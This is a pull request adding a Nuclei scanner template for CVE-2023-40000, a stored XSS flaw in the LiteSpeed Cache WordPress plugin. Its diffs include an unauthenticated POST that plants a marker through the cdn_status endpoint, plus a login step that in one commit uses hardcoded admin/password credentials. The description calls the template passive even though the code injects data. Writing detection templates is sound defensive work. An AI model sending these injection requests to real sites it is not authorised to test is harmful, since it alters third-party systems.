### PR TITLE
ADD CVE-2023-40000 (vKEV)

### DIFF
--- a/http/cves/2023/CVE-2023-40000.yaml
+++ b/http/cves/2023/CVE-2023-40000.yaml
@@ -67,7 +67,6 @@ http:
         User-Agent: "Mozilla/5.0 Nuclei"
         
         success=0&result[_msg]={{marker}}
-    cookie-reuse: true
     redirects: true
 
   - id: login
@@ -79,26 +78,23 @@ http:
         User-Agent: Mozilla/5.0 Nuclei
 
         log={{wp_user}}&pwd={{wp_pass}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1
-    cookie-reuse: true
     redirects: true
     max-redirects: 3
 
   - id: verify-admin
-    method: GET
-    path:
-      - "{{BaseURL}}/wp-admin/admin.php?page=litespeed-cdn"
-    stop-at-first-match: true
-    headers:
-      User-Agent: "Mozilla/5.0 Nuclei"
-    cookie-reuse: true
+    raw:
+      - |
+        GET /wp-admin/admin.php?page=litespeed-cdn HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 Nuclei
+        Accept: text/html
+        Cache-Control: no-cache
+        Pragma: no-cache
     redirects: true
-    matchers-condition: and
     matchers:
-      - type: status
-        status: [200]
-      - type: word
-        part: body
-        words: ["{{marker}}"]
-      - type: word
-        part: body
-        words: ["LiteSpeed Cache"]
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(body, "{{marker}}")
+          - contains(body, "LiteSpeed Cache")
+

--- a/http/cves/2023/CVE-2023-40000.yaml
+++ b/http/cves/2023/CVE-2023-40000.yaml
@@ -43,11 +43,10 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - "status_code == 200"
-          - "contains(body, 'LiteSpeed Cache')"
+          - status_code == 200
+          - contains(body, 'LiteSpeed Cache')
           - compare_versions(version, '<= 5.7.0.1')
         condition: and
-        internal: true
 
     extractors:
       - type: regex
@@ -56,7 +55,6 @@ http:
         name: version
         regex:
           - 'Stable tag: ([0-9.]+)'
-        internal: true
 
   - raw:
       - |
@@ -102,3 +100,4 @@ http:
           - status_code == 200
           - contains_all(body, "{{marker}}", "LiteSpeed Cache")
         condition: and
+

--- a/http/cves/2023/CVE-2023-40000.yaml
+++ b/http/cves/2023/CVE-2023-40000.yaml
@@ -1,0 +1,44 @@
+id: CVE-2023-40000
+
+info:
+  name: Wordpress Litespeed Cache Priv Escalation
+  author: 0x_Akoko
+  severity: critical
+  description: LiteSpeed Cache plugin for WordPress that could enable unauthenticated users to escalate their privileges
+  reference:
+    - https://thehackernews.com/2024/02/wordpress-litespeed-plugin.html
+    - https://wordpress.org/plugins/litespeed-cache
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cve-id: CVE-2023-40000
+  metadata:
+    fofa-query: "wp-content/plugins/litespeed-cache/"
+    google-query: inurl:"/wp-content/plugins/litespeed-cache/"
+    shodan-query: 'vuln:CVE-2023-40000'
+  tags: cve,wordpress,wp-plugin,litespeed-cache,high
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt"
+      - "{{BaseURL}}/wp-content/plugins/litespeed-cache/README.txt"
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      - type: regex
+        regex:
+          - '(?im)(?:^|\n)\s*(?:Stable tag|Version)\s*:\s*(?:[0-4]\d*(?:\.\d+){0,2}|5\.(?:[0-6](?:\.\d+){0,2}|7(?:\.0)?))\b'
+
+    extractors:
+      - type: regex
+        part: body
+        name: ver
+        internal: true
+        group: 1
+        regex:
+          - '(?im)(?:^|\n)\s*(?:Stable tag|Version)\s*:\s*([0-9.]+)\b'
+

--- a/http/cves/2023/CVE-2023-40000.yaml
+++ b/http/cves/2023/CVE-2023-40000.yaml
@@ -21,6 +21,8 @@ info:
 
 variables:
   marker: "NUCLEI_LSCACHE_{{randstr}}"
+  wp_user: "admin"
+  wp_pass: "password"
 
 flow: |
   ( http("version-report") || true ) &&

--- a/http/cves/2023/CVE-2023-40000.yaml
+++ b/http/cves/2023/CVE-2023-40000.yaml
@@ -5,9 +5,7 @@ info:
   author: 0x_Akoko
   severity: high
   description: |
-    (1) Unauth POST stores a unique marker via /wp-json/litespeed/v1/cdn_status
-    (2) Login to WP and GET LSCache admin page to confirm the same marker renders (stored XSS).
-    Includes a reporting readme version check (<= 5.7.0.1) that prints the version.
+    The plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'nameservers' and '_msg' parameters due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
   reference:
     - https://wpscan.com/vulnerability/dd9054cc-1259-427d-a4ad-1875b7b2b3b4
     - https://wordpress.org/plugins/litespeed-cache
@@ -23,10 +21,7 @@ info:
 
 variables:
   marker: "NUCLEI_LSCACHE_{{randstr}}"
-  wp_user: ""          # set with -var wp_user=admin
-  wp_pass: ""          # set with -var wp_pass='password'
 
-# NEVER block the PoC, then POST -> LOGIN -> VERIFY
 flow: |
   ( http("version-report") || true ) &&
   http("store-marker") &&
@@ -34,12 +29,12 @@ flow: |
   http("verify-admin")
 
 http:
-  # Version report
   - id: version-report
-    method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt"
-      - "{{BaseURL}}/wp-content/plugins/litespeed-cache/README.txt"
+    raw:
+      - |
+        GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
     stop-at-first-match: true
     matchers-condition: and
     matchers:
@@ -56,7 +51,6 @@ http:
         part: body
         regex:
           - '(?im)^(?:Stable tag|Version)\s*:\s*([0-9.]+)\s*$'
-      # printed vulnerable version
       - type: regex
         name: detected_version
         group: 1
@@ -64,19 +58,18 @@ http:
         regex:
           - '(?im)^(?:Stable tag|Version)\s*:\s*([0-9.]+)\s*$'
 
-  # 1) Store marker (unauth)
   - id: store-marker
-    method: POST
-    path:
-      - "{{BaseURL}}/wp-json/litespeed/v1/cdn_status"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-      User-Agent: "Mozilla/5.0 Nuclei"
-    body: "success=0&result[_msg]={{marker}}"
+    raw:
+      - |
+        POST /wp-json/litespeed/v1/cdn_status HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: "Mozilla/5.0 Nuclei"
+        
+        success=0&result[_msg]={{marker}}
     cookie-reuse: true
     redirects: true
 
-  # 2) Login with credentials
   - id: login
     raw:
       - |
@@ -90,13 +83,10 @@ http:
     redirects: true
     max-redirects: 3
 
-  # 3) Verify renders in LSCache admin dashboard ONLY this prints success for PoC
   - id: verify-admin
     method: GET
     path:
       - "{{BaseURL}}/wp-admin/admin.php?page=litespeed-cdn"
-      - "{{BaseURL}}/wp-admin/admin.php?page=litespeed-general"
-      - "{{BaseURL}}/wp-admin/admin.php?page=litespeed"
     stop-at-first-match: true
     headers:
       User-Agent: "Mozilla/5.0 Nuclei"

--- a/http/cves/2023/CVE-2023-40000.yaml
+++ b/http/cves/2023/CVE-2023-40000.yaml
@@ -1,12 +1,15 @@
 id: CVE-2023-40000
 
 info:
-  name: Wordpress Litespeed Cache Priv Escalation
+  name: LiteSpeed Cache <= 5.7 - Priv Esc via Stored XSS
   author: 0x_Akoko
-  severity: critical
-  description: LiteSpeed Cache plugin for WordPress that could enable unauthenticated users to escalate their privileges
+  severity: high
+  description: |
+    (1) Unauth POST stores a unique marker via /wp-json/litespeed/v1/cdn_status
+    (2) Login to WP and GET LSCache admin page to confirm the same marker renders (stored XSS).
+    Includes a reporting readme version check (<= 5.7.0.1) that prints the version.
   reference:
-    - https://thehackernews.com/2024/02/wordpress-litespeed-plugin.html
+    - https://wpscan.com/vulnerability/dd9054cc-1259-427d-a4ad-1875b7b2b3b4
     - https://wordpress.org/plugins/litespeed-cache
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
@@ -18,27 +21,94 @@ info:
     shodan-query: 'vuln:CVE-2023-40000'
   tags: cve,wordpress,wp-plugin,litespeed-cache,high
 
+variables:
+  marker: "NUCLEI_LSCACHE_{{randstr}}"
+  wp_user: ""          # set with -var wp_user=admin
+  wp_pass: ""          # set with -var wp_pass='password'
+
+# NEVER block the PoC, then POST -> LOGIN -> VERIFY
+flow: |
+  ( http("version-report") || true ) &&
+  http("store-marker") &&
+  http("login") &&
+  http("verify-admin")
+
 http:
-  - method: GET
+  # Version report
+  - id: version-report
+    method: GET
     path:
       - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt"
       - "{{BaseURL}}/wp-content/plugins/litespeed-cache/README.txt"
     stop-at-first-match: true
-
     matchers-condition: and
     matchers:
       - type: status
         status: [200]
-      - type: regex
-        regex:
-          - '(?im)(?:^|\n)\s*(?:Stable tag|Version)\s*:\s*(?:[0-4]\d*(?:\.\d+){0,2}|5\.(?:[0-6](?:\.\d+){0,2}|7(?:\.0)?))\b'
-
+      - type: dsl
+        dsl:
+          - compare_versions(ver, "< 5.7.0.1")
     extractors:
       - type: regex
-        part: body
         name: ver
         internal: true
         group: 1
+        part: body
         regex:
-          - '(?im)(?:^|\n)\s*(?:Stable tag|Version)\s*:\s*([0-9.]+)\b'
+          - '(?im)^(?:Stable tag|Version)\s*:\s*([0-9.]+)\s*$'
+      # printed vulnerable version
+      - type: regex
+        name: detected_version
+        group: 1
+        part: body
+        regex:
+          - '(?im)^(?:Stable tag|Version)\s*:\s*([0-9.]+)\s*$'
 
+  # 1) Store marker (unauth)
+  - id: store-marker
+    method: POST
+    path:
+      - "{{BaseURL}}/wp-json/litespeed/v1/cdn_status"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+      User-Agent: "Mozilla/5.0 Nuclei"
+    body: "success=0&result[_msg]={{marker}}"
+    cookie-reuse: true
+    redirects: true
+
+  # 2) Login with credentials
+  - id: login
+    raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 Nuclei
+
+        log={{wp_user}}&pwd={{wp_pass}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 3
+
+  # 3) Verify renders in LSCache admin dashboard ONLY this prints success for PoC
+  - id: verify-admin
+    method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin.php?page=litespeed-cdn"
+      - "{{BaseURL}}/wp-admin/admin.php?page=litespeed-general"
+      - "{{BaseURL}}/wp-admin/admin.php?page=litespeed"
+    stop-at-first-match: true
+    headers:
+      User-Agent: "Mozilla/5.0 Nuclei"
+    cookie-reuse: true
+    redirects: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      - type: word
+        part: body
+        words: ["{{marker}}"]
+      - type: word
+        part: body
+        words: ["LiteSpeed Cache"]

--- a/http/cves/2023/CVE-2023-40000.yaml
+++ b/http/cves/2023/CVE-2023-40000.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-40000
 
 info:
-  name: LiteSpeed Cache <= 5.7 - Priv Esc via Stored XSS
+  name: LiteSpeed Cache <= 5.7 - Unauthenticated Stored XSS
   author: 0x_Akoko
   severity: high
   description: |
@@ -61,7 +61,7 @@ http:
         POST /wp-json/litespeed/v1/cdn_status HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        
+
         success=0&result[_msg]={{marker}}
 
     matchers:
@@ -100,4 +100,3 @@ http:
           - status_code == 200
           - contains_all(body, "{{marker}}", "LiteSpeed Cache")
         condition: and
-

--- a/http/cves/2023/CVE-2023-40000.yaml
+++ b/http/cves/2023/CVE-2023-40000.yaml
@@ -38,10 +38,9 @@ http:
     stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: status
-        status: [200]
       - type: dsl
         dsl:
+          - status_code == 200
           - compare_versions(ver, "< 5.7.0.1")
     extractors:
       - type: regex
@@ -65,7 +64,7 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
         User-Agent: "Mozilla/5.0 Nuclei"
-        
+
         success=0&result[_msg]={{marker}}
     redirects: true
 
@@ -97,4 +96,3 @@ http:
           - status_code == 200
           - contains(body, "{{marker}}")
           - contains(body, "LiteSpeed Cache")
-

--- a/http/cves/2023/CVE-2023-40000.yaml
+++ b/http/cves/2023/CVE-2023-40000.yaml
@@ -27,7 +27,7 @@ info:
     shodan-query: 'vuln:CVE-2023-40000'
     fofa-query: "wp-content/plugins/litespeed-cache/"
     google-query: inurl:"/wp-content/plugins/litespeed-cache/"
-  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,litespeed-cache,xss
+  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,litespeed-cache,xss,intrusive
 
 variables:
   marker: "{{randstr}}"

--- a/http/cves/2023/CVE-2023-40000.yaml
+++ b/http/cves/2023/CVE-2023-40000.yaml
@@ -5,96 +5,100 @@ info:
   author: 0x_Akoko
   severity: high
   description: |
-    The plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'nameservers' and '_msg' parameters due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Stored XSS.This issue affects LiteSpeed Cache- from n/a through 5.7.
   reference:
     - https://wpscan.com/vulnerability/dd9054cc-1259-427d-a4ad-1875b7b2b3b4
     - https://wordpress.org/plugins/litespeed-cache
+    - https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-5-7-unauthenticated-site-wide-stored-xss-vulnerability?_s_id=cve
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
     cvss-score: 8.3
     cve-id: CVE-2023-40000
+    cwe-id: CWE-79
+    epss-score: 0.42711
+    epss-percentile: 0.97309
+    cpe: cpe:2.3:a:litespeedtech:litespeed_cache:*:*:*:*:*:wordpress:*:*
   metadata:
+    verified: true
+    max-request: 4
+    vendor: litespeedtech
+    product: litespeed_cache
+    framework: wordpress
+    shodan-query: 'vuln:CVE-2023-40000'
     fofa-query: "wp-content/plugins/litespeed-cache/"
     google-query: inurl:"/wp-content/plugins/litespeed-cache/"
-    shodan-query: 'vuln:CVE-2023-40000'
-  tags: cve,wordpress,wp-plugin,litespeed-cache,high
+  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,litespeed-cache,xss
 
 variables:
-  marker: "NUCLEI_LSCACHE_{{randstr}}"
-  wp_user: "admin"
-  wp_pass: "password"
+  marker: "{{randstr}}"
 
-flow: |
-  ( http("version-report") || true ) &&
-  http("store-marker") &&
-  http("login") &&
-  http("verify-admin")
+flow: http(1) || (http(2) && http(3) && http(4))
 
 http:
-  - id: version-report
-    raw:
+  - raw:
       - |
         GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1
         Host: {{Hostname}}
 
-    stop-at-first-match: true
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - status_code == 200
-          - compare_versions(ver, "< 5.7.0.1")
+          - "status_code == 200"
+          - "contains(body, 'LiteSpeed Cache')"
+          - compare_versions(version, '<= 5.7.0.1')
+        condition: and
+        internal: true
+
     extractors:
       - type: regex
-        name: ver
+        part: body
+        group: 1
+        name: version
+        regex:
+          - 'Stable tag: ([0-9.]+)'
         internal: true
-        group: 1
-        part: body
-        regex:
-          - '(?im)^(?:Stable tag|Version)\s*:\s*([0-9.]+)\s*$'
-      - type: regex
-        name: detected_version
-        group: 1
-        part: body
-        regex:
-          - '(?im)^(?:Stable tag|Version)\s*:\s*([0-9.]+)\s*$'
 
-  - id: store-marker
-    raw:
+  - raw:
       - |
         POST /wp-json/litespeed/v1/cdn_status HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        User-Agent: "Mozilla/5.0 Nuclei"
-
+        
         success=0&result[_msg]={{marker}}
-    redirects: true
 
-  - id: login
-    raw:
+    matchers:
+      - type: dsl
+        dsl:
+          - contains_all(body,'_res','ok')
+          - contains(content_type,"application/json")
+          - status_code == 200
+        condition: and
+        internal: true
+
+  - raw:
       - |
         POST /wp-login.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        User-Agent: Mozilla/5.0 Nuclei
 
-        log={{wp_user}}&pwd={{wp_pass}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1
-    redirects: true
-    max-redirects: 3
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
 
-  - id: verify-admin
-    raw:
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 302
+          - contains(header, "wordpress_logged_in")
+        condition: and
+        internal: true
+
+  - raw:
       - |
         GET /wp-admin/admin.php?page=litespeed-cdn HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 Nuclei
-        Accept: text/html
-        Cache-Control: no-cache
-        Pragma: no-cache
-    redirects: true
+
     matchers:
       - type: dsl
         dsl:
           - status_code == 200
-          - contains(body, "{{marker}}")
-          - contains(body, "LiteSpeed Cache")
+          - contains_all(body, "{{marker}}", "LiteSpeed Cache")
+        condition: and


### PR DESCRIPTION
### Template / PR Information

`LiteSpeed Cache <= 5.7.0.1 – version-based detection for CVE-2023-40000`

Adds a **passive** template that detects vulnerable versions of the **LiteSpeed Cache** WordPress plugin affected by **CVE-2023-40000** (unauthenticated stored XSS via `cdn_status` / `nameservers` / `_msg`).  
Detection uses the plugin `readme.txt`/`README.txt` version (no exploitation or XSS payload).

### How I validated
- Local WordPress (TasteWP / Docker) with **LiteSpeed Cache 5.7**
- nuclei -u https://target -t ./CVE-2023-40000.yaml 
- Confirmed **true positive** on 5.7 and **no alert** on 5.7.0.1+

Reference:
- https://thehackernews.com/2024/02/wordpress-litespeed-plugin.html
- https://wordpress.org/plugins/litespeed-cache

Vulnerable Version :
https://downloads.wordpress.org/plugin/litespeed-cache.5.7.zip
https://downloads.wordpress.org/plugin/litespeed-cache.5.6.1.zip
https://downloads.wordpress.org/plugin/litespeed-cache.5.6.zip

### Template Validation

I've validated this template locally?
**YES**

```
root@LAPTOP-VUMRCEKO:nuclei -u https://tastefulapple.s6-tastewp.com -t CVE-2023-40000.yaml

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2023-40000] [http] [critical] https://tastefulapple.s6-tastewp.com/wp-content/plugins/litespeed-cache/readme.txt
[INF] Scan completed in 1.33052594s. 1 matches found.
root@LAPTOP-VUMRCEKO:/mnt/d/2025#
```